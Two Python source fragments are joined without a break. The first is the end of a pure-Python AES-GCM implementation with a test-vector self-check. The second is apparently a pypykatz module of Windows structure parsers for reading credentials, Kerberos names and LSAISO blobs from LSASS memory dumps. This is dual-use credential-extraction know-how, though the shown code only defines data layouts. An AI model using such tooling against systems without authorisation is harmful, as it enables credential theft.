		if init_value == self.prev_init_value:
			raise InvalidInputException('IV must not be reused!')
		self.prev_init_value = init_value

		len_plaintext = len(plaintext)

		if len_plaintext > 0:
			ctrval_init = init_value + b'\x00'*4
			ctrval = int.from_bytes(ctrval_init, byteorder='big', signed=False)
			counter = Counter(initial_value=ctrval+2) #+2 ????
			aes_ctr = AESModeOfOperationCTR(self.__master_key, counter=counter)

			if 0 != len_plaintext % 16:
				padded_plaintext = plaintext + \
					b'\x00' * (16 - len_plaintext % 16)
			else:
				padded_plaintext = plaintext
			ciphertext = aes_ctr.encrypt(padded_plaintext)[:len_plaintext]

		else:
			ciphertext = b''

		auth_tag = self.__ghash(auth_data, ciphertext)
		iv_int = int.from_bytes(init_value, byteorder='big', signed=False)
		iv_int = (iv_int << 32) | 1
		iv_int = iv_int.to_bytes(16, byteorder='big', signed=False)
		iv_int_enc = self.__aes_ecb.encrypt(iv_int)
		iv_int_enc = int.from_bytes(iv_int_enc, byteorder='big', signed=False)

		auth_tag ^= iv_int_enc

		assert auth_tag < (1 << 128)
		return ciphertext, auth_tag.to_bytes(16, byteorder='big', signed=False)

	def decrypt(self, init_value, ciphertext, auth_tag, auth_data=b''):
		if len(init_value) != 12:
			raise InvalidInputException('IV should be 96-bit')
		if len(auth_tag) != 16:
			raise InvalidInputException('Tag should be 128-bit')

		iv_int = int.from_bytes(init_value, byteorder='big', signed=False)
		iv_int = (iv_int << 32) | 1
		iv_int = iv_int.to_bytes(16, byteorder='big', signed=False)
		iv_int_enc = self.__aes_ecb.encrypt(iv_int)
		iv_int_enc = int.from_bytes(iv_int_enc, byteorder='big', signed=False)
		auth_tag_verify = self.__ghash(auth_data, ciphertext) ^ iv_int_enc
		auth_tag_verify = auth_tag_verify.to_bytes(16, byteorder='big', signed=False)
		if auth_tag != auth_tag_verify:
			raise InvalidTagException

		len_ciphertext = len(ciphertext)
		if len_ciphertext > 0:
			ctrval_init = init_value + b'\x00'*4
			ctrval = int.from_bytes(ctrval_init, byteorder='big', signed=False)
			counter = Counter(initial_value=ctrval+2) #+2 ????
			aes_ctr = AESModeOfOperationCTR(self.__master_key, counter=counter)

			if 0 != len_ciphertext % 16:
				padded_ciphertext = ciphertext + \
					b'\x00' * (16 - len_ciphertext % 16)
			else:
				padded_ciphertext = ciphertext
			plaintext = aes_ctr.decrypt(padded_ciphertext)[:len_ciphertext]

		else:
			plaintext = b''

		return plaintext


if __name__ == '__main__':
	master_key = bytes.fromhex('feffe9928665731c6d6a8f9467308308')
	plaintext = b'\xd9\x31\x32\x25\xf8\x84\x06\xe5' + \
				b'\xa5\x59\x09\xc5\xaf\xf5\x26\x9a' + \
				b'\x86\xa7\xa9\x53\x15\x34\xf7\xda' + \
				b'\x2e\x4c\x30\x3d\x8a\x31\x8a\x72' + \
				b'\x1c\x3c\x0c\x95\x95\x68\x09\x53' + \
				b'\x2f\xcf\x0e\x24\x49\xa6\xb5\x25' + \
				b'\xb1\x6a\xed\xf5\xaa\x0d\xe6\x57' + \
				b'\xba\x63\x7b\x39'
	auth_data = b'\xfe\xed\xfa\xce\xde\xad\xbe\xef' + \
				b'\xfe\xed\xfa\xce\xde\xad\xbe\xef' + \
				b'\xab\xad\xda\xd2'
	init_value = bytes.fromhex('cafebabefacedbaddecaf888')
	ciphertext = b'\x42\x83\x1e\xc2\x21\x77\x74\x24' + \
				 b'\x4b\x72\x21\xb7\x84\xd0\xd4\x9c' + \
				 b'\xe3\xaa\x21\x2f\x2c\x02\xa4\xe0' + \
				 b'\x35\xc1\x7e\x23\x29\xac\xa1\x2e' + \
				 b'\x21\xd5\x14\xb2\x54\x66\x93\x1c' + \
				 b'\x7d\x8f\x6a\x5a\xac\x84\xaa\x05' + \
				 b'\x1b\xa3\x0b\x39\x6a\x0a\xac\x97' + \
				 b'\x3d\x58\xe0\x91'
	auth_tag = bytes.fromhex('5bc94fbc3221a5db94fae95ae7121a47')

	print('plaintext:', plaintext.hex())

	my_gcm = AES_GCM(master_key)
	encrypted, new_tag = my_gcm.encrypt(init_value, plaintext, auth_data)
	print('encrypted:', encrypted.hex())
	print('auth tag: ', new_tag.hex())

	assert encrypted == bytes.fromhex('42831ec2217774244b7221b784d0d49ce3aa212f2c02a4e035c17e2329aca12e21d514b25466931c7d8f6a5aac84aa051ba30b396a0aac973d58e091')
	assert new_tag == bytes.fromhex('5bc94fbc3221a5db94fae95ae7121a47')
	
	decrypted = my_gcm.decrypt(init_value, encrypted, new_tag, auth_data)
	print('decrypted:', decrypted.hex())


	#new_tag = int.from_bytes(new_tag, byteorder='big', signed=False)
	#try:
	#	decrypted = my_gcm.decrypt(init_value, encrypted, new_tag + 1, auth_data)
	#except InvalidTagException:
		




#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import io
import enum
import logging
from minidump.win_datatypes import DWORD, LONG, LONGLONG, \
	POINTER, UINT8, ULONG, PWSTR, USHORT, PCHAR, SHORT, \
	BYTE, PVOID, WORD, DWORD64
#from pypykatz.commons.common import *

class LARGE_INTEGER:
	def __init__(self, reader):
		self.LowPart = DWORD(reader).value
		self.HighPart = LONG(reader).value
		self.QuadPart = LONGLONG(reader).value

class PSID(POINTER):
	def __init__(self, reader):
		super().__init__(reader, SID)

class SID:
	def __init__(self, reader):
		self.Revision = UINT8(reader).value
		self.SubAuthorityCount = UINT8(reader).value
		self.IdentifierAuthority = int.from_bytes(b'\x00\x00' + reader.read(6), byteorder = 'big', signed = False)
		self.SubAuthority = []
		for _ in range(self.SubAuthorityCount):
			self.SubAuthority.append(ULONG(reader).value)
	
	def __str__(self):
		t = 'S-%d-%d' % (self.Revision, self.IdentifierAuthority)
		for subauthority in self.SubAuthority:
			t+= '-%d' % (subauthority)
		return t
		
class LUID:
	def __init__(self, reader):
		self.LowPart = DWORD(reader).value
		self.HighPart = LONG(reader).value
		self.value = (self.HighPart << 32) + self.LowPart
		
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms721841(v=vs.85).aspx
class LSA_UNICODE_STRING:
	def __init__(self, reader):
		self.Length= USHORT(reader).value
		self.MaximumLength = USHORT(reader).value
		reader.align()
		self.Buffer = PWSTR(reader).value
		
	def read_string(self, reader):
		if self.Buffer == 0 or self.Length == 0:
			return ''
		reader.move(self.Buffer)
		data = reader.read(self.Length)
		data_str = data.decode('utf-16-le').rstrip('\0')
		return data_str
		
	def read_data(self, reader):
		if self.Buffer == 0 or self.Length == 0:
			return b''
		reader.move(self.Buffer)
		return reader.read(self.Length)
		
	def read_maxdata(self, reader):
		if self.Buffer == 0 or self.Length == 0:
			return b''
		reader.move(self.Buffer)
		return reader.read(self.MaximumLength)
		
# https://msdn.microsoft.com/en-us/library/windows/hardware/ff540605(v=vs.85).aspx
class PANSI_STRING(POINTER):
	def __init__(self, reader):
		super().__init__(reader, ANSI_STRING)
		
class ANSI_STRING:
	def __init__(self, reader):
		self.Length = USHORT(reader)
		self.MaximumLength = USHORT(reader)
		#reader.align()
		self.Buffer = PCHAR(reader).value
		
	def read_string(self, reader):
		if self.Buffer == 0 or self.Length == 0:
			return ''
		reader.move(self.Buffer)
		data = reader.read(self.Length)
		data_str = data.decode().rstrip('\0')
		return data_str
		
	def read_data(self, reader):
		if self.Buffer == 0 or self.Length == 0:
			return b''
		reader.move(self.Buffer)
		return reader.read(self.Length)

# https://msdn.microsoft.com/en-us/library/windows/desktop/aa378064(v=vs.85).aspx

class KerberosNameType(enum.Enum):
	KRB_NT_UNKNOWN = 0
	KRB_NT_PRINCIPAL = 1
	KRB_NT_PRINCIPAL_AND_ID = -131
	KRB_NT_SRV_INST = 2
	KRB_NT_SRV_INST_AND_ID = -132
	KRB_NT_SRV_HST = 3
	KRB_NT_SRV_XHST = 4
	KRB_NT_UID = 5
	KRB_NT_ENTERPRISE_PRINCIPAL = 10
	KRB_NT_ENT_PRINCIPAL_AND_ID = -130
	KRB_NT_MS_PRINCIPAL = -128
	KRB_NT_MS_PRINCIPAL_AND_ID = -129
	
class PKERB_EXTERNAL_NAME(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KERB_EXTERNAL_NAME)

class KERB_EXTERNAL_NAME:
	def __init__(self, reader):
		self.NameType = SHORT(reader).value #KerberosNameType(SHORT(reader).value)
		self.NameCount = USHORT(reader).value
		reader.align()
		self.Names = []	# list of LSA_UNICODE_STRING
		for _ in range(self.NameCount):
			self.Names.append(LSA_UNICODE_STRING(reader))
		
	def read(self, reader):
		t = []
		for name in self.Names:
			t.append(name.read_string(reader))
		return t
		
		
class KIWI_GENERIC_PRIMARY_CREDENTIAL:
	def __init__(self, reader):
		self.UserName = LSA_UNICODE_STRING(reader)
		self.Domaine = LSA_UNICODE_STRING(reader)
		self.Password = LSA_UNICODE_STRING(reader)

class PRTL_BALANCED_LINKS(POINTER):
	def __init__(self, reader):
		super().__init__(reader, RTL_BALANCED_LINKS)

class RTL_BALANCED_LINKS:
	def __init__(self, reader):
		self.Parent = PRTL_BALANCED_LINKS(reader)
		self.LeftChild = PRTL_BALANCED_LINKS(reader)
		self.RightChild = PRTL_BALANCED_LINKS(reader)
		self.Balance = BYTE(reader).value
		self.Reserved = reader.read(3) # // align
		reader.align()

class PRTL_AVL_TABLE(POINTER):
	def __init__(self, reader):
		super().__init__(reader, RTL_AVL_TABLE)
		
class RTL_AVL_TABLE:
	def __init__(self, reader):
		self.BalancedRoot = RTL_BALANCED_LINKS(reader)
		self.OrderedPointer = PVOID(reader)
		self.WhichOrderedElement = ULONG(reader).value
		self.NumberGenericTableElements = ULONG(reader).value
		self.DepthOfTree = ULONG(reader).value
		reader.align()
		self.RestartKey = PRTL_BALANCED_LINKS(reader)
		self.DeleteCount = ULONG(reader).value
		reader.align()
		self.CompareRoutine = PVOID (reader)# //
		self.AllocateRoutine = PVOID(reader) #//
		self.FreeRoutine = PVOID(reader)#//
		TableContext = PVOID(reader)

class PLSAISO_DATA_BLOB(POINTER):
	def __init__(self, reader):
		super().__init__(reader, LSAISO_DATA_BLOB)
		
class LSAISO_DATA_BLOB:
	size = 9*4 + 3*16 + 16 #+sizeof array ?ANYSIZE_ARRAY
	def __init__(self, reader):
		self.structSize = DWORD(reader)
		self.unk0 = DWORD(reader)
		self.typeSize = DWORD(reader)
		self.unk1 = DWORD(reader)
		self.unk2 = DWORD(reader)
		self.unk3 = DWORD(reader)
		self.unk4 = DWORD(reader)
		self.unkKeyData = reader.read(3*16)
		self.unkData2 = reader.read(16)
		self.unk5 = DWORD(reader)
		self.origSize = DWORD(reader)
		self.data = None #size determined later
		
		
class ENC_LSAISO_DATA_BLOB:
	def __init__(self, reader):
		self.unkData1 = reader.read(16)
		self.unkData2 = reader.read(16)
		self.data = None #size determined later
		
class GUID:
	def __init__(self, reader):
		self.Data1 = DWORD(reader).value
		self.Data2 = WORD(reader).value
		self.Data3 = WORD(reader).value
		self.Data4 = reader.read(8)
		self.value = '-'.join([
			hex(self.Data1)[2:].zfill(8), 
			hex(self.Data2)[2:].zfill(4), 
			hex(self.Data3)[2:].zfill(4), 
			hex(int.from_bytes(self.Data4[:2], byteorder = 'big', signed = False))[2:].zfill(4),
			hex(int.from_bytes(self.Data4[2:], byteorder = 'big', signed = False))[2:].zfill(12)
		])
	
	@staticmethod
	def from_string(str):
		guid = GUID()
		guid.Data1 = bytes.fromhex(str.split('-')[0])
		guid.Data2 = bytes.fromhex(str.split('-')[1])
		guid.Data3 = bytes.fromhex(str.split('-')[2])
		guid.Data4 = bytes.fromhex(str.split('-')[3])
		guid.Data4 += bytes.fromhex(str.split('-')[4])
		return guid			

class PLIST_ENTRY(POINTER):
	def __init__(self, reader):
		super().__init__(reader, LIST_ENTRY)
		
class LIST_ENTRY:
	def __init__(self, reader):
		self.location = reader.tell()
		self.Flink = PLIST_ENTRY(reader)
		self.Blink = PLIST_ENTRY(reader)
		
